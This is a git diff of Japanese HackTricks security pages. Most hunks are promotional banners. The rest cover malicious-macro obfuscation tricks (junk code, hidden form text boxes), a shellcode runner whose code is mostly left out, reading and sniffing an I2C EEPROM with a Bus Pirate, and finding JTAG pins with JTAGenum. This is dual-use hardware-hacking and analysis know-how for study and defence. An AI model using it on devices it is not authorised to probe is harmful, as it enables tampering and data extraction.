- **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか?または、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksのリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudのリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
```
|
||||
|
|
|
@ -1,22 +1,20 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社で働いていますか?** **HackTricksで会社を宣伝したいですか?** または、**最新バージョンのPEASSにアクセスしたいですか?** または、**HackTricksをPDFでダウンロードしたいですか?** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのスワッグ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
オリジナルコード(https://github.com/OALabs/BlobRunner)から変更されたのは10行目だけです。
|
||||
**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付け、ビルド**するだけでコンパイルできます。
|
||||
[元のコード](https://github.com/OALabs/BlobRunner)から変更された唯一の行は10行目です。
|
||||
コンパイルするには、**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付けてビルドします**。
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
@ -222,16 +220,14 @@ return 0;
|
|||
```
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,29 +1,42 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**PEASSファミリー**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## ジャンクコード
|
||||
|
||||
**使用されないジャンクコード**を見つけることは非常に一般的であり、マクロのリバースエンジニアリングを困難にするために使用されます。\
|
||||
たとえば、次の画像では、決して真にならないIfが使用されて、いくつかのジャンクで無駄なコードが実行されることが示されています。
|
||||
マクロのリバーシングをより困難にするために、**決して使用されないジャンクコードが見つかることが非常に一般的です**。\
|
||||
例えば、以下の画像では、決して真実にならないIfが使用されているのを見ることができます。これはいくつかのジャンクで無駄なコードを実行するためです。
|
||||
|
||||
![](<../.gitbook/assets/image (373).png>)
|
||||
|
||||
## マクロフォーム
|
||||
|
||||
**GetObject**関数を使用すると、マクロのフォームからデータを取得することができます。これは分析を困難にするために使用できます。次は、テキストボックス内にデータを**隠すために使用されるマクロフォーム**の写真です(テキストボックスは他のテキストボックスを隠すことができます)。
|
||||
**GetObject**関数を使用すると、マクロのフォームからデータを取得することができます。これは分析を困難にするために使用されます。以下は、テキストボックス内にデータを**隠すために使用されるマクロフォーム**の写真です(テキストボックスが他のテキストボックスを隠している可能性があります):
|
||||
|
||||
![](<../.gitbook/assets/image (374).png>)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**PEASSファミリー**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,27 +1,20 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
# Bus Pirate
|
||||
|
||||
Bus Pirateが動作しているかをテストするには、+5VをVPUに接続し、3.3VをADCに接続し、バスパイレートにアクセスします(例えば、Tera Termを使用)そして、コマンド`~`を使用します:
|
||||
Bus Pirateが動作しているかをテストするには、+5VをVPUに、3.3VをADCに接続し、Bus Pirateにアクセスします(例えばTera Termを使用)し、コマンド`~`を使用します:
|
||||
```bash
|
||||
# Use command
|
||||
HiZ>~
|
||||
|
@ -60,18 +53,18 @@ Any key to exit
|
|||
#Press space
|
||||
Found 0 errors.
|
||||
```
|
||||
前のコマンドラインで、エラーが0個見つかったと表示されました。これは、購入後やファームウェアのフラッシュ後に動作していることを確認するために非常に役立ちます。
|
||||
前のコマンドラインで0エラーが見つかったと表示されたことがわかります。これは、購入後やファームウェアをフラッシュした後に動作していることを知るのに非常に役立ちます。
|
||||
|
||||
バスパイレートに接続するには、以下のドキュメントに従ってください:
|
||||
バスパイレートに接続するには、ドキュメントに従ってください:
|
||||
|
||||
![](<../../.gitbook/assets/image (307) (2).png>)
|
||||
|
||||
この場合、私はEPROMに接続する予定です:ATMEL901 24C256 PU27:
|
||||
この場合、EPROMに接続します:ATMEL901 24C256 PU27:
|
||||
|
||||
![](<../../.gitbook/assets/image (465) (2) (1).png>)
|
||||
|
||||
バスパイレートと通信するために、Tera Termを使用し、パイレートバスのCOMポートに接続し、Setup --> Serial Port --> Speedを115200に設定しました。\
|
||||
以下の通信では、I2Cでバスパイレートを準備し、メモリから書き込みと読み取りを行う方法が示されています(コメントは"#"を使用して表示されますが、通信の一部ではありません)。
|
||||
バスパイレートと通信するには、Tera Termを使用してバスパイレートのCOMポートに接続し、セットアップ --> シリアルポート --> 速度は115200に設定しました。\
|
||||
以下の通信では、バスパイレートをI2Cで話す準備と、メモリからの書き込みと読み取り方法を見つけることができます(コメントは"#"を使用して表示されますが、通信にその部分が表示されることはありません):
|
||||
```bash
|
||||
# Check communication with buspirate
|
||||
i
|
||||
|
@ -172,7 +165,7 @@ NACK
|
|||
```
|
||||
## スニファー
|
||||
|
||||
このシナリオでは、Arduinoと前のEPROM間のI2C通信をスニフすることになります。両方のデバイスを接続し、その後、バスパイレートをSCL、SDA、およびGNDピンに接続するだけです。
|
||||
このシナリオでは、Arduinoと前述のEPROM間のI2C通信をスニッフします。両デバイスを接続し、次にBus PirateをSCL、SDA、GNDピンに接続するだけです:
|
||||
|
||||
![](<../../.gitbook/assets/image (201) (2) (1).png>)
|
||||
```bash
|
||||
|
@ -222,16 +215,14 @@ Any key to exit
|
|||
```
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,54 +1,50 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# JTAGenum
|
||||
|
||||
[**JTAGenum**](https://github.com/cyphunk/JTAGenum)は、Raspberry PIまたはArduinoと組み合わせて、不明なチップからJTAGピンを見つけるために使用できるツールです。\
|
||||
**Arduino**では、**2から11のピンをJTAGピンに接続**し、Arduino GNDをベースボードのGNDに接続します。Arduinoにプログラムをロードし、すべてのピンをブルートフォースしてJTAGピンが存在するかどうか、およびそれぞれのピンがどれかを見つけようとします。\
|
||||
**Raspberry PI**では、**1から6のピン**のみを使用できます(6つのピンなので、各潜在的なJTAGピンをテストするのに時間がかかります)。
|
||||
[**JTAGenum**](https://github.com/cyphunk/JTAGenum)は、未知のチップからJTAGピンを試すためにRaspberry PIまたはArduinoで使用できるツールです。\
|
||||
**Arduino**では、**2番から11番のピンをJTAGに属する可能性のある10ピンに接続します**。Arduinoにプログラムをロードすると、すべてのピンをブルートフォースして、JTAGに属するピンがあるかどうか、そしてそれぞれがどれであるかを見つけます。\
|
||||
**Raspberry PI**では、**1番から6番のピンのみ使用できます**(6ピンなので、潜在的なJTAGピンをテストするのに時間がかかります)。
|
||||
|
||||
## Arduino
|
||||
|
||||
Arduinoでは、ケーブルを接続した後(ピン2から11をJTAGピンに接続し、Arduino GNDをベースボードのGNDに接続)、Arduinoに**JTAGenumプログラムをロード**し、シリアルモニターに**`h`**(ヘルプのコマンド)を送信すると、ヘルプが表示されます。
|
||||
Arduinoでは、ケーブルを接続した後(2番から11番のピンをJTAGピンに、Arduino GNDをベースボードGNDに接続)、**ArduinoにJTAGenumプログラムをロード**し、シリアルモニターで**`h`**(ヘルプのためのコマンド)を送信すると、ヘルプが表示されます:
|
||||
|
||||
![](<../../.gitbook/assets/image (643).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (650).png>)
|
||||
|
||||
**「改行なし」および115200ボー」**で設定してください。\
|
||||
スキャンを開始するには、コマンドsを送信します。
|
||||
**"No line ending"と115200baudを設定します**。\
|
||||
スキャンを開始するためにコマンドsを送信します:
|
||||
|
||||
![](<../../.gitbook/assets/image (651) (1) (1) (1).png>)
|
||||
|
||||
JTAGに接続している場合、JTAGのピンを示す**「FOUND!」で始まる1つまたは複数の行**が見つかります。
|
||||
JTAGに接触している場合、JTAGのピンを示す**FOUND!で始まる一行または複数の行**が見つかります。
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
